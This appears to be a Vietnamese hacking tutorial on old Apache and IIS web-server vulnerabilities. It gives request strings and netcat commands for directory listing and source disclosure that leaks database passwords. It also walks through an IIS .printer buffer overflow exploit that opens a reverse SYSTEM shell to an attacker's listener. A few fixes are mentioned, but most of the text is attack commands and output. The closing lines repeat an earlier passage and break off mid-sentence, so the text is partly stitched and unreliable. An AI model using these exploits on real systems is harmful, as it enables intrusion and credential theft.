Đầu tiên xin nói về các lỗ hổng cố yếu. A.Lỗ hổng webserver sử dụng apache: một url dài có thể khiến apache nhả ra nội dung cấu trúc các thư mục ,ví dụ: http://victim.com/cgi-bin/////////// ////////////// (chú ý là thường apache server ko thể xử lí các url có quá 8000 kí tự). Lỗ hổng này chỉ có thể dùng với version trước 1.3.19 ,từ version apache 1.3.19 nó đã được fix.Nhưng hãy nhớ là các module mod_dir,mod_autoindex thường là mặc định tồn tại trên server.Script sau có thể đảm bảo cho server: [rohan apache]$ ./configure disable-module=dir disable-module=autoindex Ngoài ra với lỗ hổng Multiview trên apache ,có thể thực hiện trực ttiếp trên url hoặc là từ cmd line sử dụng netcat: [rohan]$ echo –e "GET /some_directory?M=D HTTP/1.0\n\n" | \ > nc 192.168.42.17 80 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <TITLE>Index of /some_directory</TITLE> </HEAD> <BODY> <H1>Index of /some_directory</H1> <PRE><IMG SRC="/icons/blank.gif" ALT=" "> <A HREF="?N=A">Name</A> <A HREF="?M=A">Last modified</A> <A HREF="?S=A">Size</A> <A HREF="?D=A">Description</A> <HR> <A HREF="/">Parent Directory</A> 20-Oct-1998 08:58 - <A HREF="cgi-bin/">cgi-bin/</A> 28-Oct-1998 05:06 - <A HREF="messages/">messages/</A> 20-Oct-1998 08:58 - <A HREF="wwwboard.html">wwwboard.html</A> 16-Apr-1998 19:43 1k <A HREF="passwd.txt">passwd.txt</A> 16-Apr-1998 19:30 1k <A HREF="data.txt">data.txt</A> 16-Apr-1998 19:29 1k <A HREF="faq.html">faq.html</A> 16-Apr-1998 19:28 2k </PRE><HR> </BODY></HTML> Nếu may mắn ta có thể kiếm được nhiều thứ ở đây. Cách phòng chống là không nên để những thứ nhạy cảm ở đây. Lỗ hổng mod_rewirite có thể cho phép hacker có các thong tin về thừ mục trên server ,thường là do sự map local page với đường dẫn đầy đủ.Các bạn xem thử: /more-icons/(.*) /home/httpd/icons/$1 Nếu mode này đã được fix :/more-icons/(.*) /icons/$1 Cách fix đơn giản là hãy dùng các đường dẫn tương đối. mod_auth_*sqlinjection : việc chèn dấu ' ( dấu nháy đơn) vào request có thể khiến ta có được một câu lệnh sql tuỳ ý. Cách fix lỗi này là nâng cấp gói mod_auth_*sql và nếu cần thiết hãy restart lại apache server. B.Microsoft Internet Information Server -IIS Microsoft vẫn nổi tiếng với đặc tính nhiều lỗ hỗng ,dễ dãi hơn trong các việc trao đổi dữ liệu.Tấn công này có thể chia thành :Tấn công vào các thành phần của iis,Tấn công chính iis. Thứ nhất là tấn công vào thành phần của nó.Như biết,IIS dùng nhiều file dll chạy cùng nó trên server .Đây chính là lỗ hổng dẫn tới các tấn công như server- sidescript execution,content indexing,web-based printing , vv.Hãy xem về tràn bộ đệm ISAPI DLL: Lỗ hổng này xảy ra khi bộ đệm xấp xỉ 420 byte được gửi đi kèm theo http host: header của một yêu cầu .printer ISAPI ,như ví dụ ,khi [buffer] cỡ 420 kí tự: GET /NULL.printer HTTP/1.0 Host: [buffer] Điều này sẽ gây ra tràn bộ đệm và thông thường sẽ tắt IIS ngay tức khắc.Tuy nhiên Window 2000 sẽ tự động khởi động lại IIS (inetinfo.exe).Chú ý rằng một web site default trên victim server dừng lại nếu shell hiện thời là không thể connect (shell đang làm việc trên server),nếu nó không được tắt cẩn thận,hoặc nếu có một vài lỗi xảy ra.Cố gắng khởi động web site từ console trên victim server sẽ fail,và machine của server cần được reboot để cứu lại dữ liệu từ điều kiện này. Hãy xem khai thác dưới làm việc.Đầu tiên khởi động một listener trên hệ thống của attacker( chúng ta?)-ở đây là netcat: C:\>nc -vv -l -p 2002 listening on [any] 2002 sau đó đưa vào đích khai thác tại attacker 's listener: C:\>jill 192.168.234.222 80 192.168.234.250 2002 iis5 remote .printer overflow. dark spyrit <dspyrit@beavuh.org> / beavuh labs. connecting sent you may need to send a carriage on your listener if the shell doesn't appear. have fun! Nếu tất cả diễn ra theo đúng dự định thì một khoảng thời gian ngắn sau khi các dòng lệnh làm việc,một remote shell sẽ hiện ra trên listener của attacker.Lưu ý là bạn phải làm cho shell xuất hiện khi bạn nhìn thấy kết nối đã được nhận-và sau mỗi lệnh tiếp theo cũng phải làm vậy( nhắc lại rằng điều này xuất hiện trên attacker's system).Đơn giản chỉ như sau: C:\>nc -vv -l -p 2002 listening on [any] 2002 connect to [192.168.234.250] from MANDALAY [192.168.234.222] 1117 [carriage return] Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> C:\WINNT\system32>whoami whoami [carriage return] NT AUTHORITY\SYSTEM Chúng ta đã sử dụng tiện ích whoami ( trong window 2000 resource kit) để thấy shell này đang chạy trong ngữ cảnh tài khoản đầy đủ quyền hạn hệ thống từ remote machine. Bởi vì sự khởi đầu tấn công xuất hiện thông qua kênh ứng dụng web( thường là port 80 ) và vì shell được hiện ra bên ngoài từ victim web server trên một cổng đã được định nghĩa bởi attacker nên tấn công này thường tránh dùng router ko tưong xứng hày là một tường lửa lọc dữ liệu. Tiếp theo là lỗ hổng ISAPI DLL Source Disclosure ( phơi bày tài nguyên): lỗ hổng +.htr là một ví dụ về phơi bày tài nguyên ,thường với IIS 4 và 5.Thêm +.htr vào một active file request,IIS ( 4 và 5) sẽ đưa ra dữ liệu nguồn của file thay vì thực hiện nó ( trong ISM.DLL).Đuôi mở rộng .htr sẽ map tới ISM.DLL ,file mà server sẽ đưa ra dữ liệu.Đây là một ví dụ sử dụng 1 file htr.txt sad.gif sử dụng netcat) GET /site1/global.asa+.htr HTTP/1.0 [CRLF] [CRLF] Tiếp tục thực hiện: C:\>nc -vv www.victim.com 80 < htr.txt Kết quả www.victim.com [10.0.0.10] 80 (http) open HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 25 Jan 2001 00:50:17 GMT <! filename = global.asa - -> ("Profiles_ConnectString") = "DSN=profiles;UID=Company_user;Password=secret " ("DB_ConnectString") = "DSN=db;UID=Company_user;Password=secret" ("PHFConnectionString") = "DSN=phf;UID=sa;PWD=" . Cách phòng chống là không nên để những thứ nhạy cảm ở đây. Lỗ hổng mod_rewirite có thể cho phép hacker có các thong tin về thừ mục trên server ,thường là do sự map local page với đường dẫn đầy